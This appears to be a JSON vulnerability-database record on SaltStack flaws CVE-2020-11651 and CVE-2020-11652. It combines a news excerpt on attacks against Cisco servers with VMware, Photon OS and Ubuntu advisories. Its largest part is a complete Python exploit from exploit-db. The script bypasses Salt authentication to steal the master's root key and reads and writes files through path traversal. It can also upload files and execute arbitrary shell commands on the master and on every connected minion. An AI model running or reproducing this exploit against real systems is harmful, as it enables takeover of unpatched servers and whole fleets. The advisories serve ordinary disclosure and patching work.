This in turn allows access to the entire file system of the master server, researchers found.\n\nSaltStack released patches for the flaw in [release 3000.2](<https://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html>), on April 30 \u2013 however, researchers with F-Secure, who discovered the flaw, said a preliminary scan revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet \u2014 and warned that exploits in the wild are imminent.\n\nThose predictions have proved true: In the beginning of May, for instance, hackers targeted the publishing platform Ghost by exploiting critical [vulnerabilities in ](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>)[SaltStack](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>), used in Ghost\u2019s server management infrastructure to launch a cryptojacking attack against its servers that led to widespread outages.\n\nCisco said that for Cisco CML and Cisco VIRL-PE (software releases 1.5 and 1.6) if the salt-master service is enabled \u201cthe exploitability of the product depends on how the product has been deployed.\u201d A full list of the impact and recommended action for each deployment option, for each Cisco software release, [can be found on Cisco\u2019s alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG>).\n\nTo be exploited, the salt-master service must be reachable on TCP ports 4505 and 4506, Cisco said. 
The company added that administrators can check their configured Cisco salt-master server by navigating to VIRL Server > Salt Configuration and Status.\n\n\u201cCisco continues to strongly recommend that customers upgrade to a fixed software release to remediate these vulnerabilities,\u201d Cisco said.\n", "cvss3": {}, "published": "2020-05-28T20:51:25", "type": "threatpost", "title": "Hackers Compromise Cisco Servers Via SaltStack Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-05-28T20:51:25", "id": "THREATPOST:64DC6B60F693E46DD314DB70A547D319", "href": "https://threatpost.com/hackers-compromise-cisco-servers-saltstack/156091/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2022-11-02T11:54:21", "description": "3\\. vRealize Operations Application Remote Collector (ARC) addresses Authentication Bypass (CVE-2020-11651) and Directory Traversal (CVE-2020-11652) vulnerabilities. \n\nThe Application Remote Collector (ARC) introduced with vRealize Operations 7.5 utilizes Salt which is affected by CVE-2020-11651 and CVE-2020-11652. 
VMware has evaluated CVE-2020-11651 (Authentication Bypass) to be in the Critical severity range with a maximum CVSSv3 base score of 10.0 and CVE-2020-11652 (Directory Traversal) to be in the Important severity range with a maximum CVSSv3 base score of 7.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-08T00:00:00", "type": "vmware", "title": "vRealize Operations Application Remote Collector (ARC) addresses Authentication Bypass and Directory Traversal vulnerabilities (CVE-2020-11651, CVE-2020-11652)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-15T00:00:00", "id": "VMSA-2020-0009.1", "href": "https://www.vmware.com/security/advisories/VMSA-2020-0009.1.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "photon": [{"lastseen": "2021-11-03T14:58:18", "description": "An update of {'salt3', 'iproute2'} packages of Photon OS has been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-15T00:00:00", "type": "photon", "title": "Lightwave - PHSA-2020-3.0-0091", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20795", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-15T00:00:00", "id": "PHSA-2020-3.0-0091", "href": "https://github.com/vmware/photon/wiki/Security-Updates-3.0-91", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T18:48:34", "description": "Updates of ['salt3', 'iproute2'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-15T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2020-0091", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 
10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20795", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-15T00:00:00", "id": "PHSA-2020-0091", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-91", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-03T17:48:58", "description": "An update of {'salt', 'salt3', 'ruby'} packages of Photon OS has been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-14T00:00:00", "type": "photon", "title": "Lightwave - PHSA-2020-1.0-0294", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2020-10663", "CVE-2020-10933", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-14T00:00:00", "id": "PHSA-2020-1.0-0294", "href": "https://github.com/vmware/photon/wiki/Security-Updates-1.0-294", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T06:07:10", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-05T00:00:00", "type": "exploitdb", "title": "Saltstack 3000.1 - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-11651", "2020-11652", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-05T00:00:00", "id": "EDB-ID:48421", "href": "https://www.exploit-db.com/exploits/48421", "sourceData": "# Exploit Title: Saltstack 3000.1 - Remote Code Execution\r\n# Date: 2020-05-04\r\n# Exploit Author: Jasper Lievisse Adriaanse\r\n# Vendor Homepage: https://www.saltstack.com/\r\n# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*\r\n# Tested on: Debian 10 with Salt 2019.2.0\r\n# CVE : CVE-2020-11651 and CVE-2020-11652\r\n# Description: Saltstack authentication bypass/remote code 
execution\r\n#\r\n# Source: https://github.com/jasperla/CVE-2020-11651-poc\r\n# This exploit is based on this checker script:\r\n# https://github.com/rossengeorgiev/salt-security-backports\r\n\r\n#!/usr/bin/env python\r\n#\r\n# Exploit for CVE-2020-11651 and CVE-2020-11652\r\n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)\r\n# This exploit is based on this checker script:\r\n# https://github.com/rossengeorgiev/salt-security-backports\r\n\r\nfrom __future__ import absolute_import, print_function, unicode_literals\r\nimport argparse\r\nimport datetime\r\nimport os\r\nimport os.path\r\nimport sys\r\nimport time\r\n\r\nimport salt\r\nimport salt.version\r\nimport salt.transport.client\r\nimport salt.exceptions\r\n\r\ndef init_minion(master_ip, master_port):\r\n    # Minimal minion config: the 'clear' crypt below talks to the request\r\n    # server without any authentication, which is what the bypass relies on.\r\n    minion_config = {\r\n        'transport': 'zeromq',\r\n        'pki_dir': '/tmp',\r\n        'id': 'root',\r\n        'log_level': 'debug',\r\n        'master_ip': master_ip,\r\n        'master_port': master_port,\r\n        'auth_timeout': 5,\r\n        'auth_tries': 1,\r\n        'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)\r\n    }\r\n\r\n    return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')\r\n\r\n# --- check funcs ----\r\n\r\ndef check_connection(master_ip, master_port, channel):\r\n    print(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='')\r\n    sys.stdout.flush()\r\n\r\n    # connection check\r\n    try:\r\n        channel.send({'cmd':'ping'}, timeout=2)\r\n    except salt.exceptions.SaltReqTimeoutError:\r\n        print(\"OFFLINE\")\r\n        sys.exit(1)\r\n    else:\r\n        print(\"ONLINE\")\r\n\r\ndef check_CVE_2020_11651(channel):\r\n    # Calls the internal _prep_auth_info method over the clear channel; a\r\n    # vulnerable master answers with its root key.\r\n    print(\"[+] Checking if vulnerable to CVE-2020-11651... 
\", end='')\r\n    sys.stdout.flush()\r\n\r\n    try:\r\n        rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)\r\n    except:\r\n        print('ERROR')\r\n        return None\r\n    else:\r\n        pass\r\n    finally:\r\n        if rets:\r\n            print('YES')\r\n            root_key = rets[2]['root']\r\n            return root_key\r\n\r\n    print('NO')\r\n    return None\r\n\r\ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):\r\n    # Passes a filesystem path as the 'token' parameter of get_token; the\r\n    # unsanitized token is used directly as a filename on the master.\r\n    print(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='')\r\n    sys.stdout.flush()\r\n\r\n    # try read file\r\n    msg = {\r\n        'cmd': 'get_token',\r\n        'arg': [],\r\n        'token': top_secret_file_path,\r\n    }\r\n\r\n    try:\r\n        rets = channel.send(msg, timeout=3)\r\n    except salt.exceptions.SaltReqTimeoutError:\r\n        print(\"YES\")\r\n    except:\r\n        print(\"ERROR\")\r\n        raise\r\n    else:\r\n        if debug:\r\n            print()\r\n            print(rets)\r\n        print(\"NO\")\r\n\r\ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):\r\n    # Uses the stolen root key to call the wheel file_roots.read function\r\n    # with a path that is joined onto the file root without canonicalization.\r\n    print(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... \", end='')\r\n    sys.stdout.flush()\r\n\r\n    # try read file\r\n    msg = {\r\n        'key': root_key,\r\n        'cmd': 'wheel',\r\n        'fun': 'file_roots.read',\r\n        'path': top_secret_file_path,\r\n        'saltenv': 'base',\r\n    }\r\n\r\n    try:\r\n        rets = channel.send(msg, timeout=3)\r\n    except salt.exceptions.SaltReqTimeoutError:\r\n        print(\"TIMEOUT\")\r\n    except:\r\n        print(\"ERROR\")\r\n        raise\r\n    else:\r\n        if debug:\r\n            print()\r\n            print(rets)\r\n        if rets['data']['return']:\r\n            print(\"YES\")\r\n        else:\r\n            print(\"NO\")\r\n\r\ndef check_CVE_2020_11652_write1(debug, channel, root_key):\r\n    print(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... 
\", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.write',\r\n 'path': '../../../../../../../../tmp/salt_CVE_2020_11652',\r\n 'data': 'evil',\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n\r\n pp(rets)\r\n if rets['data']['return'].startswith('Wrote'):\r\n try:\r\n os.remove('/tmp/salt_CVE_2020_11652')\r\n except OSError:\r\n print(\"Maybe?\")\r\n else:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef check_CVE_2020_11652_write2(debug, channel, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'config.update_config',\r\n 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',\r\n 'yaml_contents': 'evil',\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n if rets['data']['return'].startswith('Wrote'):\r\n try:\r\n os.remove('/tmp/salt_CVE_2020_11652.conf')\r\n except OSError:\r\n print(\"Maybe?\")\r\n else:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef pwn_read_file(channel, root_key, path, master_ip):\r\n print(\"[+] Attemping to read {} from {}\".format(path, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.read',\r\n 'path': path,\r\n 'saltenv': 'base',\r\n }\r\n\r\n rets = channel.send(msg, timeout=3)\r\n print(rets['data']['return'][0][path])\r\n\r\ndef pwn_upload_file(channel, root_key, src, dest, master_ip):\r\n print(\"[+] Attemping 
to upload {} to {} on {}\".format(src, dest, master_ip))\r\n sys.stdout.flush()\r\n\r\n try:\r\n fh = open(src, 'rb')\r\n payload = fh.read()\r\n fh.close()\r\n except Exception as e:\r\n print('[-] Failed to read {}: {}'.format(src, e))\r\n return\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.write',\r\n 'saltenv': 'base',\r\n 'data': payload,\r\n 'path': dest,\r\n }\r\n\r\n rets = channel.send(msg, timeout=3)\r\n print('[ ] {}'.format(rets['data']['return']))\r\n\r\ndef pwn_exec(channel, root_key, cmd, master_ip, jid):\r\n print(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'runner',\r\n 'fun': 'salt.cmd',\r\n 'saltenv': 'base',\r\n 'user': 'sudo_user',\r\n 'kwarg': {\r\n 'fun': 'cmd.exec_code',\r\n 'lang': 'python',\r\n 'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd)\r\n },\r\n 'jid': jid,\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except Exception as e:\r\n print('[-] Failed to submit job')\r\n return\r\n\r\n if rets.get('jid'):\r\n print('[+] Successfully scheduled job: {}'.format(rets['jid']))\r\n\r\ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid):\r\n print(\"[+] Attemping to execute '{}' on all minions connected to {}\".format(cmd, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': '_send_pub',\r\n 'fun': 'cmd.run',\r\n 'user': 'root',\r\n 'arg': [ \"/bin/sh -c '{}'\".format(cmd) ],\r\n 'tgt': '*',\r\n 'tgt_type': 'glob',\r\n 'ret': '',\r\n 'jid': jid\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except Exception as e:\r\n print('[-] Failed to submit job')\r\n return\r\n finally:\r\n if rets == None:\r\n print('[+] Successfully submitted job to all minions.')\r\n else:\r\n print('[-] Failed to submit job')\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and 
CVE-2020-11652')\r\n parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')\r\n parser.add_argument('--port', '-p', dest='master_port', default='4506')\r\n parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')\r\n parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')\r\n parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')\r\n parser.add_argument('--read', '-r', dest='read_file')\r\n parser.add_argument('--upload-src', dest='upload_src')\r\n parser.add_argument('--upload-dest', dest='upload_dest')\r\n parser.add_argument('--exec', dest='exec', help='Run a command on the master')\r\n parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')\r\n args = parser.parse_args()\r\n\r\n print(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.\")\r\n time.sleep(1)\r\n\r\n # Both src and destination are required for uploads\r\n if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):\r\n print('[-] Must provide both --upload-src and --upload-dest')\r\n sys.exit(1)\r\n\r\n channel = init_minion(args.master_ip, args.master_port)\r\n\r\n check_connection(args.master_ip, args.master_port, channel)\r\n \r\n root_key = check_CVE_2020_11651(channel)\r\n if root_key:\r\n print('[*] root key obtained: {}'.format(root_key))\r\n else:\r\n print('[-] Failed to find root key...aborting')\r\n sys.exit(127)\r\n\r\n if args.run_checks:\r\n # Assuming this check runs on the master itself, create a file with \"secret\" content\r\n # and abuse CVE-2020-11652 to read it.\r\n top_secret_file_path = '/tmp/salt_cve_teta'\r\n with salt.utils.fopen(top_secret_file_path, 'w') as fd:\r\n fd.write(\"top secret\")\r\n\r\n # Again, this assumes we're running this check on the master itself\r\n with 
salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:\r\n root_key = keyfd.read()\r\n\r\n check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path)\r\n check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key)\r\n check_CVE_2020_11652_write1(debug, channel, root_key)\r\n check_CVE_2020_11652_write2(debug, channel, root_key)\r\n os.remove(top_secret_file_path)\r\n sys.exit(0)\r\n\r\n if args.read_file:\r\n pwn_read_file(channel, root_key, args.read_file, args.master_ip)\r\n\r\n if args.upload_src:\r\n if os.path.isabs(args.upload_dest):\r\n print('[-] Destination path must be relative; aborting')\r\n sys.exit(1)\r\n pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)\r\n\r\n\r\n jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())\r\n\r\n if args.exec:\r\n pwn_exec(channel, root_key, args.exec, args.master_ip, jid)\r\n\r\n if args.exec_all:\r\n print(\"[!] Lester, is this what you want? Hit ^C to abort.\")\r\n time.sleep(2)\r\n pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/48421", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-01-26T15:34:51", "description": "## Releases\n\n * Ubuntu 18.04 LTS\n * Ubuntu 16.04 ESM\n\n## Packages\n\n * salt \\- Infrastructure management built on a dynamic communication bus\n\nIt was discovered that Salt allows remote attackers to determine which files \nexist on the server. An attacker could use that to extract sensitive \ninformation. (CVE-2018-15750)\n\nIt was discovered that Salt has a vulnerability that allows an user to bypass \nauthentication. An attacker could use that to extract sensitive information, \nexecute abritrary code or crash the server. (CVE-2018-15751)\n\nIt was discovered that Salt is vulnerable to command injection. 
This allows \nan unauthenticated attacker with network access to the API endpoint to \nexecute arbitrary code on the salt-api host. (CVE-2019-17361)\n\nIt was discovered that Salt incorrectly validated method calls and \nsanitized paths. A remote attacker could possibly use this issue to access \nsome methods without authentication. (CVE-2020-11651, CVE-2020-11652)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-13T00:00:00", "type": "ubuntu", "title": "Salt vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2019-17361", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-08-13T00:00:00", "id": "USN-4459-1", "href": "https://ubuntu.com/security/notices/USN-4459-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}